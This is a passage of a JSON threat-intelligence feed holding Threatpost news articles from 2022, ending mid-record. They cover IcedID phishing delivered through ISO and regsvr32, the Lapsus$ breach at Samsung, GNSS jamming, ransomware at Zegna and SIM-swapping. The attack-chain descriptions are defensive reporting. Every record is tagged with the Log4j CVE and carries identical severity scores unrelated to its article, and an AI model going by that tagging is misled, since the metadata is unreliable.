"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T14:00:57", "id": "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "href": "https://threatpost.com/gumshoe-nabs-cybercrooks-fbi-tactics/178298/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T14:30:43", "description": "The ever-evolving [banking trojan IcedID](<https://threatpost.com/icedid-web-forms-google-urls/165347/>) is back again with a phishing campaign that uses previously compromised Microsoft Exchange servers to send emails that appear to come from legitimate accounts. Attackers also are using stealthy new payload-delivery tactics to spread the modular malware.\n\nResearchers from [Intezer](<https://www.intezer.com/>) earlier this month uncovered the campaign, which employs thread hijacking to send malicious messages from stolen Exchange accounts, thus adding an extra level of evasion to the campaign\u2019s malicious intent, wrote researchers [Joakim Kennedy](<https://www.intezer.com/author/jkennedy/>) and [Ryan Robinson](<https://www.intezer.com/author/ryanrobinson/>) [in a blog post](<https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/>) published Monday.\n\nThe actors behind IcedID \u2013 as well as other spearphishers \u2013 have previously used phishing emails that \u201creuse previously stolen emails to make the lure more convincing,\u201d researchers wrote. However, this time the threat has evolved in a couple of key ways that make it even more dangerous to targets, which include organizations within energy, healthcare, law and pharmaceutical sectors, researchers noted.\n\nNot only is the threat actor now using compromised Microsoft Exchange servers to send the phishing emails from the account that they stole from, but the delivery of the malicious payload also has shifted in a way that can execute malware without the user even knowing, researchers said.\n\n\u201cThe payload has also moved away from using office documents to the use of ISO files with a Windows LNK file and a DLL file,\u201d researchers wrote. \u201cThe use of ISO files allows the threat actor to bypass the [Mark-of-the-Web](<https://attack.mitre.org/techniques/T1553/005/>) controls, resulting in execution of the malware without warning to the user.\u201d\n\nPreviously the infection chain most commonly associated with IcedID phishing campaigns has been an email with an attached password-protected ZIP archive that contains a macro-enabled Office document, which executes the IcedID installer.\n\n## **Breakdown of the Attack Chain**\n\nThe new campaign starts with a phishing email that includes a message about an important document and includes a password-protected ZIP archive file attached, the password for which is included in the email body.\n\nThe email seems extra convincing to users because it uses what\u2019s called \u201cthread hijacking,\u201d in which attackers use a portion of a previous thread from a legitimate email found in the inbox of the stolen account.\n\n\u201cBy using this approach, the email appears more legitimate and is transported through the normal channels which can also include security products,\u201d researchers wrote.\n\nThe majority of the originating Exchange servers that researchers observed in the campaign appear to be unpatched and publicly exposed, \u201cmaking the ProxyShell vector a good theory,\u201d they wrote. [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) is a remote-code execution (RCE) bug discovered in Exchange Servers last year that has since been patched but has been [throttled by attackers](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>).\n\nOnce unzipped, the attached file includes a single \u201cISO\u201d file with the same file name as the ZIP archive that was created not that long before the email was sent. That ISO file includes two files: a LNK file named \u201cdocument\u201d and a DLL file named \u201cmain,\u201d also prepared relatively recently and potentially used in previous phishing email, researchers said.\n\nWhen a user double clicks the LNK file, it uses \u201cregsvr32\u201d to execute the DLL file, which allows for proxy execution of malicious code in main.dll for defense evasion, they wrote in the post. The DLL file is a loader for the IcedID payload.\n\nThe loader will locate the encrypted payload, which is stored in the resource section of the binary, through the technique API hashing. The resulting hash is then compared with a hardcoded hash, locating the call for FindResourceA, which is dynamically called to fetch the encrypted payload, researchers wrote.\n\nThe ultimate step in the attack chain is that the IcedID \u201cGziploader\u201d payload is decoded and placed in memory and then executed. The GZiploader fingerprints the machine and sends a beacon to the command-and-control (C2) server \u2013 located at yourgroceries[.]top_._ \u2013 with information about the infected host, which then can be used for further nefarious activity.\n\n## **Evolution of a Threat**\n\nResearchers at IBM first discovered IcedID [back in 2017](<https://threatpost.com/new-icedid-trojan-targets-us-banks/128851/>) as a trojan targeting banks, payment card providers, mobile services providers, payroll, web mail and e-commerce sites.\n\nThe malware has [evolved over the years](<https://threatpost.com/botnet-operators-team-up-to-leverage-icedid-trickbot-trojans/132392/>) and already has a storied history of clever obfuscation. For example, it [resurfaced](<https://threatpost.com/icedid-banker-adding-steganography-covid-19-theme/156718/>) during the [COVID-19 campaign](<https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware>) with new functionality that uses steganography \u2013 the practice of hiding code within images to stealthily infect victims \u2013 as well as other enhancements.\n\nThe new campaign is evidence of its [further evolution](<https://threatpost.com/spam-icedid-banking-trojan-variant/167250/>) and could signify that IcedID is indeed becoming, [as many fear](<https://threatpost.com/icedid-banking-trojan-surges-emotet/165314/>), the new [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) \u2013 a modular threat that began as a trojan but steadily evolved into one of the most dangerous malwares ever seen.\n\n\u201cThis attack shows how much effort attackers put in all the time to evade detection and why defense in depth is necessary,\u201d observed Saumitra Das, CTO and co-founder at security firm [Blue Hexagon](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATURk7nu5DOXPXjQHtUbQPB-2Bo-3Dj4oZ_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8GJOp9iX7pVlW-2BkiIYpN1sif0KFuJYXLhOJYPn-2B9Sn-2Baowev7BWgf7-2Fsft7vhZ-2FleI4B1CtNAbekmGpeBhmEFQ0kWRSkTE0FzXKh-2Bz963fPXZn0hvo6ZGATosJpWWMJIx2kznvRhglY0WQkeZMakpGSSCIz9LKVoA7IXOHVn5P16MOaoTEh1LFaqgv30hL1UfNg9Za-2FKpoEtnwzBDLz4DtQVA3dFYwDxuvZKeD9Y8Hi4WQLnSai8UFna4-2BIEwYtA0NcX5KrsjsbSEnjBzFNfZ-2B0-3D>), in an email to Threatpost.\n\nThis time and effort, in turn, shows a level of sophistication on the part of those behind IcedID in that they have thorough knowledge of contemporary email protections and are continuously adding new tactics as security also grows and evolves, he said.\n\n\u201cMany email security systems use reputation of senders to block malicious email without being able to assess the email itself,\u201d Das noted. \u201cHere, they used compromised Exchange servers to make it through.\u201d\n\nThe group\u2019s use of obfuscated file formats to deliver malware, as well as the final payload\u2019s delivery over the network, also demonstrate that the threat actors know how to evade signature and sandboxes, he added.\n\n\u201cThese attacks often go much deeper than simply stealing data,\u201d concurred Chris Clements, vice president of solutions architecture at security firm [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PZQLK_6bll2uIcECOBsx1gx1IC2zx-2FnKyCXka4AgKvEYqpnW0-2BDbBUicS42bKww9XV5LeOm8YSoCZbw6XkWDSfAMcb8IRiPIGKWMahkivu0WTh5PX5dG77IJVWKxIQtQJVv-2BIYMmRr5z7OIF8mKih-2F25UI0RQa6-2Bdcn0eyt9a-2F-2BxbdAQ8flodV7haNCcr-2BW1iLqgw0DYt7ntjLmuD7PDGwxwwHSq2gHGWVXVmYGWcDbHq95V0DcFYQggLtmHop2EFskxujGp5A7HFr4-2Bzu8HP-2Fn84dnll5nv7EwsYGa4Z-2BkWEdDcrCAY75JBexQSBfFsv2LbL-2Bn1Qz-2FYzen2NsuzLcfAC1av2zq9EhGfkk9KycL0qVySQ-3D>)**, **in an email to Threatpost. \u201cThe cybercriminals take the time to read through the mailboxes to understand the inter-organization relationships and operating procedures.\n\n\u201cTo protect themselves from similar attacks, it\u2019s critical that organizations ensure that they apply security patches promptly and thoroughly in their environment,\u201d he added. However, what is historically true for patching remains true now: that it\u2019s \u201ca task that\u2019s easier said than done,\u201d Clemens acknowledged.\n\n\u201cIt really takes a cultural approach to cybersecurity to plan for failures in defenses like patch management,\u201d he said.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T14:02:41", "type": "threatpost", "title": "Exchange Servers Speared in IcedID Phishing Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-29T14:02:41", "id": "THREATPOST:8243943141B8F18343765DA77D33F46C", "href": "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. \u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T20:14:45", "description": "In a warning to aviation authorities and air operators on Thursday, the European Union Aviation Safety Agency (EASA) warned of satellite jamming and spoofing attacks across a broad swath of Eastern Europe that could affect air navigation systems.\n\nThe warning came in tandem with a separate alert from the FBI and the U.S. Cybersecurity Infrastructure and Security Agency (CISA) that hackers could be targeting satellite communications networks in general.\n\n## **Quit Jammin\u2019 Me**\n\nThe navigation-jamming attacks affecting airplanes started Feb. 24, the first day of the Russian invasion of Ukraine, EASA said \u2013 and they\u2019ve continued to proliferate. So far, the affected areas include the Black Sea airspace, Eastern Finland, the Kaliningrad region and other Baltic areas, and the Eastern Mediterranean area near Cyprus, Turkey, Lebanon, Syria and Israel, as well as Northern Iraq.\n\n\u201cThe effects of [Global Navigation Satellite Systems (GNSS)] jamming and/or possible spoofing were observed by aircraft in various phases of their flights, in certain cases leading to re-routing or even to change the destination due to the inability to perform a safe landing procedure,\u201d EASA warned (PDF). \u201cUnder the present conditions, it is not possible to predict GNSS outages and their effects.\u201d\n\nLosing a GNSS signal could result in many negative outcomes, including pilots \u201cflying blind,\u201d without the use of waypoint navigation to tell where they are. Outages could also affect the ability for an airplane\u2019s instrumentation to accurately track the aircraft\u2019s position, which could lead to a plane entering contested airspace; the inability to properly gauge one\u2019s proximity to the ground (which could trigger pull-up commands, according to the alert); or the failure of systems that address dangers like wind shear.\n\n\u201cThe magnitude of the issues generated by such outage would depend upon the extent of the area concerned, on the duration and on the phase of flight of the affected aircraft,\u201d EASA warned.\n\nThe agency urged air operators to make sure that fall-back conventional navigation infrastructure is fully operational onboard the aircraft, and to ensure reliable surveillance coverage that is resilient to GNSS interference, such as ground-based navigational aids (i.e., Distance Measuring Equipment or DME, and Very High Frequency omnidirectional range or VOR).\n\n\u201cVerify the aircraft position by means of conventional navigation aids when flights are operated in proximity of the affected areas; check that the navigation aids critical to the operation for the intended route and approach are available; and remain prepared to revert to a conventional arrival procedure where appropriate and inform air traffic controllers in such a case,\u201d EASA recommended. \u201cEnsure, in the flight planning and execution phase, the availability of alternative conventional arrival and approach procedures (i.e. an aerodrome in the affected area with only GNSS approach procedure should not be considered as destination or alternate).\u201d\n\n## **CISA Warns on Satellite Network Hacking**\n\nThe concerns over the hacking of satellite systems in general also began Feb. 24, when Ukrainian official reported that hackers had apparently compromised one of the nation\u2019s satellite systems. According [to Reuters](<https://www.reuters.com/world/europe/exclusive-us-spy-agency-probes-sabotage-satellite-internet-during-russian-2022-03-11/>), the attack made communication with the Viasat KA-SAT satellite impossible, which resulted in internet outages across Europe, with tens of thousands of people cut off.\n\nThe cyberattackers took advantage of a misconfigured management interface for the satellite network, Viasat said.\n\nThe National Security Agency is looking into whether the attack was carried out by Russian state-sponsored actors, according to the report.\n\nThis week, CISA [tersely warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-076a>) that it is \u201caware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers\u2019 customer environments.\u201d\n\nThe agency advised satellite operators to start monitoring at ingress and egress points for anomalous traffic, including the use of various remote access tools (Telnet, FTP, SSH and so on); connections out to \u201cunexpected\u201d network segments; unauthorized use of local or backup accounts; unexpected traffic to terminals or closed-group SATCOM networks; and brute-force login attempts.\n\nSatellite customers meanwhile should implement multifactor authentication (MFA) on their accounts, CISA warned, and should shore up least-privilege approaches for any sensitive areas served by satellite links.\n\nAndreas Galauner, lead security researcher at Rapid7, noted that in the U.S., critical infrastructure is likely the target for such attacks.\n\n\u201cAlmost no private individual uses SATCOM, as it is costly and the latency is too high and slow,\u201d he said via email. \u201cThis leaves industrial and critical infrastructures, which makes SATCOM an appealing target.\u201d\n\nJames McQuiggan, security awareness advocate at KnowBe4, made a similar assessment.\n\n\u201cCommunication is a critical element needed in life these days, whether between families or between governments,\u201d he emailed. \u201cIf the ability to communicate is lost, it becomes challenging to strategize, coordinate or plan. When cybercriminals are targeting this element of critical infrastructure, cyber-resiliency is essential to remain in contact. Organizations working with SATCOM products or services need to ensure protections to secure access to the devices with multi-factor authentication. Ensure all systems are up to date with software and firmware updates, increase monitoring of traffic and logs, and review incident response plans to prepare for an outage.\u201d\n\nISPs of all stripes should be vigilant, Galauner added.\n\n\u201cEven though this particular risk relates to satellite communication networks, this has happened before in \u2018normal\u2019 ISPs,\u201d he said. \u201cIn those instances, what got \u2018pwned\u2019 is the CPE: modems and routers that weren\u2019t configured properly by the ISP. This could happen on DSL and cable lines as much as it can happen here. However, a satellite network, possibly spanning huge geographical areas, might allow attackers to perform more widespread attacks without having to be in the physical vicinity.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T20:05:36", "type": "threatpost", "title": "Agencies Warn on Satellite Hacks & GPS Jamming Affecting Airplanes, Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T20:05:36", "id": "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "href": "https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T17:29:37", "description": "High-end Italian fashion house Ermenegildo Zegna revealed on Monday that it was the target of a ransomware attack last August \u2014 and that it managed to recover its systems from back-up without paying a ransom.\n\nThe Milan-based firm already [had revealed](<https://www.zegnagroup.com/en/news/27-important-security-update-from-the-ermenegildo-zegna-group/>) on Aug. 6, 2021, that it became aware of unauthorized access to its systems but did not disclose the specific type of breach.\n\nIn a [public filing](<https://docoh.com/filing/1877787/0001193125-22-100975/ZGN-424B3>) this week, however, the company acknowledged that it was a ransomware attack that \u201cimpacted the majority of our IT systems\u201d and ultimately led to some private accounting data stolen in the incident to be leaked online.\n\nIndeed, the [RansomExx ransomware](<https://threatpost.com/ransomexx-ransomware-gang-dumps-stolen-embraer-data-report/161918/>) operation claimed responsibility for the August attack and published leaked data stolen from the company online the day Zegna fist announced the incident, according to a [report published](<https://www.bleepingcomputer.com/news/security/luxury-fashion-house-zegna-confirms-august-ransomware-attack/>) by Bleeping Computer.\n\n\u201cAs we refused to engage in discussions relating to the payment of the ransom, the responsible parties published certain accounting materials extracted from our IT systems,\u201d Zegna wrote in the filing, an SEC Form 424B3. These forms are used to update a company\u2019s investment prospectus, in this case to inform them of risk related to cyber-incidents or data breaches.\n\nZegna gradually restored its IT systems \u2014 which include multiple server locations, third-party cloud providers and a range of software applications for different regions and functions \u2014 from secure back-up servers during the weeks following the breach, the company said.\n\n\u201cAlthough our systems are diversified\u2026we periodically assess and implement actions to ameliorate risks to our systems, a significant or large-scale malfuction or interruption of our systems could adversely affect our ability to manage and keep our operations running efficiently, and damage our reputation if we are unable to track transactions and deliver products to our customers,\u201d the company said in the filing.\n\n## **Resisting the Pressure to Pay**\n\nWhile many companies choose to pay a ransom during such an attack to unlock data or prevent it from being leaked online, security professionals generally recommend that they don\u2019t because it only encourages cybercriminals.\n\nHowever, many ransomware groups now regularly resort to a method called [double extortion](<https://threatpost.com/double-extortion-ransomware-attacks-spike/154818/>), in which they not only lock up victims\u2019 IT systems but also threaten to leak sensitive data online if the organization doesn\u2019t pay by a certain time, which [adds pressure](<https://threatpost.com/double-extortion-ransomware-data-leaks/176723/>) and often results in a quick payout.\n\n\u201cAs these things go, it\u2019s fantastic that Ermenegildo Zegna recovered without capitulating to the cybercriminal gang\u2019s ultimatums,\u201d observed Chris Clements, vice president of solutions architecture at security firm Cerberus Sentinel, in an email to Threatpost. \u201cNot paying cybercriminals extortion demands is one of the most effective ways to deter cyberattacks, but far too few companies that find themselves in similar situations to restore operations in a timely fashion.\u201d\n\nIndeed, even if they can restore via back-up systems, it\u2019s the hurry to get back online and fully operational that often makes organizations cave to demands. But with ransomware such a common occurrence in the threat landscape, there is no excuse for companies not to plan for a speedy in-house recovery in the event of an attack, he said.\n\n\u201cWe\u2019ve long since reached the point that organizations of any size and in any vertical must assume that they may potentially fall victim to a comparable cyberattack and implement a strategy not only for prevention, but also for restoring systems and data at company-wide scale should the worst happen,\u201d Clements said.\n\nThe attack on Zegna also reiterates the scenario that any organization, no matter how large or small, can be a target of ransomware attacks, he added. Though it\u2019s one of the top menswear brands in the world in terms of revenue, Zegna, for example, has about 6,500 employees globally\u2013making it a relatively small fish compared to some global multinationals.\n\n\u201cWith ransomware extortion payouts routinely venturing into millions of dollars, cybercriminals have a powerful incentive to compromise every organization they are able to,\u201d Clements said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-12T17:22:38", "type": "threatpost", "title": "Menswear Brand Zegna Reveals Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-12T17:22:38", "id": "THREATPOST:97F7CB48069CDF8038E5E49508EFA458", "href": "https://threatpost.com/menswear-zegna-ransomware/179266/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T22:37:59", "description": "SIM-swapping \u2013 the practice of duping mobile carriers into switching a target\u2019s phone services to an attacker-controlled phone \u2013 is on the rise, the Feds are warning \u2013 leading to millions in losses for consumers who found their bank accounts drained and other accounts taken over.\n\nSubscriber Identity Modules (SIMs) are small chips inside mobile phones that allow the carrier to identify and register subscriber devices \u2013 a requirement to provide service to them. Most SIM-swapping attacks take the form of social engineering, where the criminals impersonate victims and convince customer-service agents to change over victims\u2019 services to new phones that they control.\n\nOnce the service has been redirected, the crooks have access to any of the victims\u2019 calls, texts, voicemails and saved profile data, which allows them to send \u201cForgot Password\u201d or \u201cAccount Recovery\u201d requests to the victim\u2019s email, which enables them to easily defeat two-factor authentication that uses one-time passcodes and thus to crack high-value accounts.\n\nWhile SIM-swapping (aka SIM-jacking) isn\u2019t a new practice, the attacks now seem to be accelerating at a rapid clip: Last year, the FBI Internet Crime Complaint Center (IC3) received 1,611 SIM swapping complaints with adjusted losses stemming from resulting account takeovers and data theft totaling more than $68 million, [it said this week](<https://www.ic3.gov/Media/Y2022/PSA220208>). In contrast, for the entire three-year period between January 2018 to December 2020, there were just 320 SIM-swapping complaints, with adjusted losses of approximately $12 million.\n\n## **SIM-Swapping: All Too Easy**\n\nIt\u2019s usually not a difficult plan to execute successfully, given that many carriers [don\u2019t ask in-depth security questions](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>) that fully verify that the caller is in fact the legitimate cell phone user. Often, the challenge questions can be answered with previously phished information or even with public information found on social-media sites.\n\nThe epidemic of large-scale data breaches also contributes to the gambit\u2019s high rate of success, according to Chris Clements, vice president of solutions architecture at Cerberus Sentinel.\n\n\u201cWhen people wonder what the consequences of large-scale data breaches are, this is exactly it,\u201d he noted via email. \u201cBoth people and companies have become conditioned to being able to verify identity through simple questions like Social Security number or mother\u2019s maiden name. Unfortunately, this falls apart completely when data breaches affecting millions of people routinely occur.\u201d\n\nOther attack vectors include phishing and insider-threat avenues. For instance, when it came to light in 2019 that Twitter CEO Jack Dorsey was the victim of a SIM swap, the New York Times [reported](<https://www.nytimes.com/2019/09/05/technology/sim-swap-jack-dorsey-hack.html>) that \u201chacking crews have paid off phone company employees to do\u2026switches for them, 